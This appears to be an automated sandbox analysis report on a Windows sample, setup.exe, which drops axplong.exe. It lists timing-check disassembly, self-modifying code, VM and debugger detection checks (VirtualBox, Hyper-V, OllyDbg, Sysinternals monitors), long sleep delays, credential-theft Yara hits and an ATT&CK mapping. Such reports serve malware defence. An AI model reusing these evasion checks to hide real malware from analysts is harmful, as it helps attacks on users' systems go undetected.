                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A083D second address: 47A0841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0841 second address: 47A0871 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE0B4F44DD1h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0871 second address: 47A0877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0877 second address: 47A08C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 mov ax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e jmp 00007FE0B4F44DD1h 0x00000013 je 00007FE127F2A8BEh 0x00000019 pushad 0x0000001a mov si, 4093h 0x0000001e movzx eax, bx 0x00000021 popad 0x00000022 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000029 pushad 0x0000002a pushad 0x0000002b mov ax, di 0x0000002e movsx ebx, si 0x00000031 popad 0x00000032 mov di, ax 0x00000035 popad 0x00000036 mov ecx, esi 0x00000038 pushad 0x00000039 mov cl, 84h 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A08C1 second address: 47A0931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 je 00007FE1275085F2h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE0B4522B27h 0x00000013 adc ah, FFFFFF8Eh 0x00000016 jmp 00007FE0B4522B29h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FE0B4522B20h 0x00000022 adc cl, 00000008h 0x00000025 jmp 00007FE0B4522B1Bh 0x0000002a popfd 0x0000002b popad 0x0000002c test byte ptr [77816968h], 00000002h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0931 second address: 47A0935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0935 second address: 47A093B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A093B second address: 47A0941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0941 second address: 47A0990 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FE127508583h 0x0000000e jmp 00007FE0B4522B20h 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 pushad 0x00000017 mov di, cx 0x0000001a call 00007FE0B4522B1Ah 0x0000001f push eax 0x00000020 pop ebx 0x00000021 pop ecx 0x00000022 popad 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FE0B4522B29h 0x0000002b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0990 second address: 47A09D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c jmp 00007FE0B4F44DCEh 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE0B4F44DD7h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A09D0 second address: 47A09FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, ebx 0x0000000d mov dx, EC2Eh 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A09FD second address: 47A0A0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0A0B second address: 47A0A10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0A68 second address: 47A0A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0A6C second address: 47A0A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0A87 second address: 47A0A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DD4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0A9F second address: 47A0B11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a call 00007FE0B4522B1Dh 0x0000000f pushfd 0x00000010 jmp 00007FE0B4522B20h 0x00000015 jmp 00007FE0B4522B25h 0x0000001a popfd 0x0000001b pop esi 0x0000001c mov ah, dl 0x0000001e popad 0x0000001f mov esp, ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushfd 0x00000025 jmp 00007FE0B4522B24h 0x0000002a jmp 00007FE0B4522B25h 0x0000002f popfd 0x00000030 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0E79 second address: 47B0E7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0E7F second address: 47B0E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0E83 second address: 47B0EFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE0B4F44DCFh 0x00000013 xor si, 9B2Eh 0x00000018 jmp 00007FE0B4F44DD9h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 movsx edx, ax 0x00000024 mov cl, D0h 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007FE0B4F44DD7h 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FE0B4F44DD5h 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47B0B86 second address: 47B0B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48307FC second address: 4830802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4830802 second address: 4830806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4830806 second address: 4830836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE0B4F44DCEh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FE0B4F44DD0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4830836 second address: 483083C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 483083C second address: 4830860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 10AE1E05h 0x00000011 jmp 00007FE0B4F44DD2h 0x00000016 popad 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820A69 second address: 4820A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820A6D second address: 4820A73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820A73 second address: 4820A9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE0B4522B1Eh 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48208F5 second address: 48208F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48208F9 second address: 48208FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48208FD second address: 4820903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820903 second address: 4820934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, cx 0x0000000e mov ecx, 148E2F87h 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007FE0B4522B1Ah 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820934 second address: 4820938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820938 second address: 482093C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 482093C second address: 4820942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C02C4 second address: 47C02E6 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE0B4522B27h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820CBA second address: 4820CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820CC0 second address: 4820CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820CC4 second address: 4820CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE0B4F44DCBh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820CDA second address: 4820D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 jmp 00007FE0B4522B1Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FE0B4522B1Bh 0x0000001a xor si, D15Eh 0x0000001f jmp 00007FE0B4522B29h 0x00000024 popfd 0x00000025 mov eax, 07527627h 0x0000002a popad 0x0000002b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820D25 second address: 4820D4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FE0B4F44DCEh 0x00000010 push dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820D4F second address: 4820D55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820D55 second address: 4820DB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FE0B4F44DD0h 0x0000000b xor ah, FFFFFFE8h 0x0000000e jmp 00007FE0B4F44DCBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push dword ptr [ebp+08h] 0x0000001a jmp 00007FE0B4F44DD6h 0x0000001f push 91FA1017h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FE0B4F44DD3h 0x0000002d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820DB2 second address: 4820DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820DB6 second address: 4820DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4820E16 second address: 4820E30 instructions: 0x00000000 rdtsc 0x00000002 mov bh, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE0B4522B20h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E7C580 second address: E7C584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47D06D5 second address: 47D06EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47D06EB second address: 47D06EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47D06EF second address: 47D06F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47D06F5 second address: 47D06FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47D06FB second address: 47D06FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: CBECF7 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: CBEC2B instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: E9B835 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: E8145C instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: EFE86A instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: ADECF7 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: ADEC2B instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: CBB835 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: CA145C instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: D1E86A instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                  Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_04820C91 rdtsc 0_2_04820C91
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 413
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 8548
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7460 Thread sleep count: 47 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7460 Thread sleep time: -94047s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7468 Thread sleep count: 50 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7468 Thread sleep time: -100050s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7440 Thread sleep count: 413 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7440 Thread sleep time: -12390000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7564 Thread sleep time: -180000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7472 Thread sleep count: 54 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7472 Thread sleep time: -108054s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7452 Thread sleep count: 81 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7452 Thread sleep time: -162081s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7452 Thread sleep count: 8548 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7452 Thread sleep time: -17104548s >= -30000s
                  Source: C:\Users\user\Desktop\setup.exe File Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
                  Source: axplong.exe, axplong.exe, 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWS
                  Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000D.00000002.2499234685.000000000054A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: setup.exe, 00000000.00000002.1335711226.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000004.00000002.1346750099.0000000000C71000.00000040.00000001.01000000.00000008.sdmp, axplong.exe, 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: C:\Users\user\Desktop\setup.exe System information queried: ModuleInformation
                  Source: C:\Users\user\Desktop\setup.exe Process information queried: ProcessInformation

                  Anti Debugging

                  Source: C:\Users\user\Desktop\setup.exe | Thread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Thread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Thread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File opened: SIWVID
                  Source: C:\Users\user\Desktop\setup.exe | Process queried: DebugPort
                  Source: C:\Users\user\Desktop\setup.exe | Process queried: DebugPort
                  Source: C:\Users\user\Desktop\setup.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process queried: DebugPort
                  Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_04820C91 rdtsc 0_2_04820C91
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 13_2_00AA645B mov eax, dword ptr fs:[00000030h] 13_2_00AA645B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 13_2_00AAA1C2 mov eax, dword ptr fs:[00000030h] 13_2_00AAA1C2
                  Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Source: axplong.exe, axplong.exe, 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: TProgram Manager
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 13_2_00A8D312 cpuid 13_2_00A8D312
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 13_2_00A8CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 13_2_00A8CB1A

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 13.2.axplong.exe.a70000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.axplong.exe.a70000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.setup.exe.c50000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000003.1247561021.0000000004610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1335650088.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.1346668514.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000D.00000003.1562495489.0000000004900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000003.1306286454.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 12 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | LSASS Memory | 741 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
